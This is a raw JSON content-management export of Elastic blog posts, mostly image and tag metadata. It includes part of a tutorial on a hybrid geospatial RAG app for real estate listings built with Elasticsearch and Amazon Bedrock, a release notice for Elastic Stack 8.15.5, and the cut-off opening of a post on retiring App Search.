href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/blob/64c18ea61ed7f31fe46a19e690d60c956ab46c60/elastic/stream-lit-app/geo-spatial-rag-elastic-bedrock.py#L179C1-L217C10\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGitHub repository\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa2d5d9c4bae958b9"}}},{"image":{"image":{"uid":"bltaf6d585d6b1de943","_version":1,"title":"Screenshot 2024-11-26 at 11.00.02 AM.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-26T16:01:22.211Z","updated_at":"2024-11-26T16:01:22.211Z","content_type":"image/png","file_size":"101553","filename":"Screenshot_2024-11-26_at_11.00.02_AM.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-26T16:02:41.851Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltaf6d585d6b1de943/6745f0d2c21e60732a261ff7/Screenshot_2024-11-26_at_11.00.02_AM.png"},"_metadata":{"uid":"csec08bbe4a9cdcc87"},"caption_l10n":"","alt_text_l10n":"Programming Language: Python 3.x screenshot","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs3b1b5a51d0b81669"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNotice in the above code:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e#1\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, We are doing a traditional keyword-based lexical search. For example, we want to search for all listings that have \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003epropertyType\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e = “Townhome” properties in Elastic.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e#2\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, We are doing a semantic search on the field \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003epropertyFeatures_v\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e which is a vector field that has the embeddings of the textual equivalent \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003epropertyFeatures\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e#3\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e, We are filtering all of the data using the geospatial coordinates (\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003egeo_coded_lat\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e and \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003egeo_coded_long\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e). In other words, for our Frisco, TX location, find all the real estate property listings within five miles.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHere is how the streamlit app displays the output in the user interface.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8f19a111b626f30e"}}},{"image":{"image":{"uid":"blt6f90793e60171b10","_version":1,"title":"image6.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-26T15:25:35.806Z","updated_at":"2024-11-26T15:25:35.806Z","content_type":"image/png","file_size":"306503","filename":"image6.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-26T16:02:41.838Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt6f90793e60171b10/6745e86f31c382242c8d193b/image6.png"},"_metadata":{"uid":"cs4c574a1b3f740d13"},"caption_l10n":"","alt_text_l10n":"chart","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Run geospatial RAG","_metadata":{"uid":"cs4c5f2af676796085"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe real estate properties data found from Elastic in the previous query is now passed as an additional context to the LLM via Amazon Bedrock to perform RAG, as \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/blob/64c18ea61ed7f31fe46a19e690d60c956ab46c60/elastic/stream-lit-app/geo-spatial-rag-elastic-bedrock.py#L225C1-L263C51\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eshown here\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eA couple of things to observe in the code:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNotice how we are \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/blob/64c18ea61ed7f31fe46a19e690d60c956ab46c60/elastic/stream-lit-app/geo-spatial-rag-elastic-bedrock.py#L422\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003epassing the results\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e we got from executing Elastic’s hybrid geospatial query as \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cspan data-type='inlineCode'\u003econtext\u003c/span\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e to RAG.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAgain, we are using a \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/blob/64c18ea61ed7f31fe46a19e690d60c956ab46c60/elastic/stream-lit-app/geo-spatial-rag-elastic-bedrock.py#L225-L237\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eprompt template\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, and we will provide Elastic’s hybrid geospatial query results as the context.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/blob/64c18ea61ed7f31fe46a19e690d60c956ab46c60/elastic/stream-lit-app/geo-spatial-rag-elastic-bedrock.py#L228\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eHere\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, we are forcing the LLM to specifically answer only in the context of the data found in the Elastic’s query.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ol\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe output would be a precise recommendation by the LLM answering specifically in the context of knowledge provided as part of the RAG pipeline. Here is an example recommendation that the \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/tree/main/elastic/stream-lit-app\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eStreamlit application\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e user interface shows to the end user as a completed response.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc85bccd8139941f1"}}},{"image":{"image":{"uid":"blt08f88002f75d05e6","_version":1,"title":"image4.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-26T15:27:20.712Z","updated_at":"2024-11-26T15:27:20.712Z","content_type":"image/png","file_size":"542016","filename":"image4.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-26T16:02:41.916Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt08f88002f75d05e6/6745e8d8799856714de22088/image4.png"},"_metadata":{"uid":"csdd682183ff3fb189"},"caption_l10n":"","alt_text_l10n":"ai responses example","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs2082304c308637b3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn addition, the \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/tree/main/elastic/stream-lit-app\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003estreamlit app\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e displays the geospatial results from Elastic plotted on a map, giving a pictorial understanding of where these real estate properties are located.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse2f1f8e1ae7c6fec"}}},{"image":{"image":{"uid":"bltfe13de5366c6c81a","_version":1,"title":"image1.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-26T15:27:55.332Z","updated_at":"2024-11-26T15:27:55.332Z","content_type":"image/png","file_size":"3027730","filename":"image1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-26T16:02:41.891Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltfe13de5366c6c81a/6745e8fb56ed5403fc12bb92/image1.png"},"_metadata":{"uid":"csee3b54deefbfcfc8"},"caption_l10n":"","alt_text_l10n":"real estate properties near frisco tx","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":"width-large: 75%"}}},{"title_text":{"title_text":[{"title_l10n":"Streamlit app","_metadata":{"uid":"cs76d8199d9816e3e2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAll of these concepts come together in the form of a streamlit app that showcases how to use Elasticsearch, Amazon Bedrock, Anthropic Claude 3, and Langchain to build a hybrid geospatial RAG solution that uses the geospatial features of Elastic.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLearn more by checking out the \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/tree/main/elastic/stream-lit-app\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eGitHub repository\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e and the \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/tree/main/elastic/stream-lit-app#setup-instructions\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003esetup instructions\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Data augmentation using AWS Data Exchange","_metadata":{"uid":"cs1f3c1f4137f83d15"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://aws.amazon.com/data-exchange/?adx-cards2.sort-by=item.additionalFields.eventDate\u0026adx-cards2.sort-order=desc\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eAWS Data Exchange\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e is a service provided by AWS that enables you to find, subscribe to, and use third-party data sets in the AWS Cloud. You can further augment and enrich your data sets with additional data from AWS Data Exchange. For example, if you want to further enrich your real estate properties geospatial data with other points of interest data, such as hospitals, malls, or nearest pharmacies, AWS Data Exchange can be used.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Explore and integrate resources","_metadata":{"uid":"cs5125237a6dd5b441"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic and Amazon Bedrock simplify the development of complex RAG solutions using enterprise data. This combination offers:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eElastic's hybrid geospatial semantic search capabilities\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAccess to various foundation models through Amazon Bedrock\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEasy building and scaling of generative AI applications\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn this post, we have:\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOutlined the essential building blocks for a hybrid geospatial RAG solution\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eProvided code examples for implementation\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eShared a \u003c/span\u003e\u003ca href=\"https://github.com/aws-samples/aws-generativeai-partner-samples/tree/main/elastic/stream-lit-app\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eGitHub repository\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e for hands-on experimentation\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe encourage you to explore these resources and integrate them into your own projects.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa78465700369f22e"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs6400e8168021b054"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs036b63a209723bf9"}}}],"publish_date":"2024-11-26","sanity_migration_complete":false,"seo":{"seo_title_l10n":"Crafting a hybrid geospatial RAG application with Elastic and Amazon Bedrock","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[{"uid":"blt5b5a3dd3ee2ae4bd","_content_type_uid":"tags_partner"}],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt284682f193d93481","ACL":{},"created_at":"2023-11-06T20:07:36.694Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-ml-models","label_l10n":"AI/ML models","tags":[],"title":"AI/ML models","updated_at":"2023-11-06T20:07:36.694Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:37.071Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":2,"locale":"en-us","uid":"blt9085022a5c6c87e9","ACL":{},"created_at":"2023-11-06T20:41:57.778Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"large-language-models","label_l10n":"Large language models","tags":[],"title":"Large language models","updated_at":"2023-11-06T20:42:13.486Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:39:28.432Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt240c2986db0ba465","ACL":{},"created_at":"2023-11-06T21:31:10.051Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"search-applications","label_l10n":"Search applications","tags":[],"title":"Search applications","updated_at":"2023-11-06T21:31:10.051Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:31:38.331Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt38a3af2dfebcb772","ACL":{},"created_at":"2024-06-06T15:02:14.821Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"retrieval-augmented-generation-rag","label_l10n":"Retrieval augmented generation (RAG)","tags":[],"title":"Retrieval augmented generation (RAG)","updated_at":"2024-06-06T15:02:14.821Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2024-06-06T15:02:17.473Z","user":"blt3044324473ef223b70bc674c"}}],"tags_use_case":[{"_version":1,"locale":"en-us","uid":"bltbc86a233655f4b8e","ACL":{},"created_at":"2022-09-13T16:43:08.111Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"elasticsearch","label_l10n":"Elasticsearch","tags":[],"title":"Elasticsearch","updated_at":"2022-09-13T16:43:08.111Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.253Z","user":"blt4b2e1169881270a8"}},{"_version":2,"locale":"en-us","uid":"bltd609f5ed6cf2db23","ACL":{},"created_at":"2020-06-17T03:33:07.306Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"geospatial","label_l10n":"Geospatial","tags":[],"title":"Geospatial","updated_at":"2020-07-06T22:20:11.933Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2021-03-23T17:30:22.430Z","user":"blt36e890d06c5ec32c"}}],"thumbnail_image":{"uid":"blt4e527c4d30fc4d9d","_version":1,"title":"power-of-your-data.jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-11-26T15:44:17.786Z","updated_at":"2024-11-26T15:44:17.786Z","content_type":"image/jpeg","file_size":"157129","filename":"power-of-your-data.jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-11-26T16:02:41.795Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4e527c4d30fc4d9d/6745ecd1278118edb95d6058/power-of-your-data.jpg"},"title":"Crafting a hybrid geospatial RAG application with Elastic and Amazon Bedrock","title_l10n":"Crafting a hybrid geospatial RAG application with Elastic and Amazon Bedrock","updated_at":"2024-11-26T16:01:24.140Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/hybrid-geospatial-rag-application-elastic-amazon-bedrock","publish_details":{"time":"2024-11-26T16:02:41.334Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt0d418088e2c5e5db","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"Read about the updates and bug fixes that have been included in this release.","author":["blt469efe6417174bf5"],"category":["bltfaae4466058cc7d6"],"created_at":"2024-11-25T20:33:02.667Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs0d7ce56472658bc0"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 11pt;'\u003eVersion 8.15.5 of the Elastic Stack was released today. We recommend you \u003c/span\u003e\u003ca href=\"https://www.elastic.co/downloads\"\u003e\u003cspan style='font-size: 11pt;'\u003eupgrade to this latest version\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 11pt;'\u003e. We recommend 8.15.5 over the previous version 8.15.4.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 11pt;'\u003eFor details of the issues that have been fixed and a full list of changes for each product in this version, please refer to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/guide/en/starting-with-the-elasticsearch-platform-and-its-solutions/8.15/new.html\"\u003e\u003cspan style='font-size: 11pt;'\u003ethe release notes\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 11pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csf55d45293dc3bd31"}}}],"publish_date":"2024-11-26","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt8836a5dda86cbfe0","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-04-01T15:42:09.734Z","updated_at":"2024-04-01T15:42:09.734Z","content_type":"image/png","file_size":"62454","filename":"Patch_release_dark.png","title":"Patch_release_dark.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-04-02T17:14:25.081Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8836a5dda86cbfe0/660ad5d11b5a5878c8adccbc/Patch_release_dark.png"},"title":"Elastic Stack 8.15.5 released","title_l10n":"Elastic Stack 8.15.5 released","updated_at":"2024-11-26T13:18:34.018Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-stack-8-15-5-released","publish_details":{"time":"2024-11-26T13:18:42.542Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt1c6cafe6c729ff78","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"We're discontinuing App Search in version 9.0, but Elasticsearch offers everything you need to build AI-powered search experiences. With integrated ML tools, semantic search, and reranking Elasticsearch simplifies search development and migration.","author":["blt4e6feaf0ce1d6ed7"],"category":["bltb79594af7c5b4199"],"created_at":"2024-11-25T14:49:02.770Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf93533303084aca2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eRecent advancements in generative AI are transforming user behavior, inspiring developers to create search experiences that are more dynamic, intuitive, and engaging. At Elastic, we’re focused on equipping developers with powerful machine learning (ML) tools in Elasticsearch to push the boundaries of modern search experiences.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs part of our commitment to innovation, we are making an important transition.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe’ve packed Elasticsearch with integrated search and machine learning tools, making semantic search — powered by Elastic Learned Sparse EncodeR (ELSER) — as simple as a single field type definition.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe're simplifying the architectural choices developers need to make by discontinuing App Search in 9.0.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe’ve put migration on your timeline: App Search will remain with its current feature set in the 8.x series, and we will continue to provide security upgrades and fixes.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor users new to the Elasticsearch capabilities, the same ease-of-use and out-of-the box search functionality that App Search users have traditionally enjoyed are all now integrated into the Elasticsearch experience. Now, users can have it all — from an accessible start that gets you searching within minutes to an infinitely customizable set of search tools that can be fine-tuned to the specifics for your use case.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHere's what you can expect:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eSemantic search made simple:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe new \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/semantic-search-simplified-semantic-text\"\u003e\u003cspan style='font-size: 12pt;'\u003esemantic_text field and semantic query\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e allow for ML-powered semantic search with just a single field.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAn out-of-the-box sparse vector model (ELSER) for semantic search or the choice to bring your own\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"csd3430be65a5d2da4"}}},{"image":{"image":{"uid":"blt327d0e4d6f8f97e6","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-11-25T14:49:39.303Z","created_by":"bltb6c155cd84fc0c1a","file_size":"105838","filename":"image2.png","parent_uid":null,"tags":[],"title":"image2.png","updated_at":"2024-11-25T14:49:39.303Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2024-11-25T16:55:00.426Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt327d0e4d6f8f97e6/67448e8356ed54db3112b386/image2.png"},"_metadata":{"uid":"csfa15896fafb97ecb"},"caption_l10n":"","alt_text_l10n":"trained 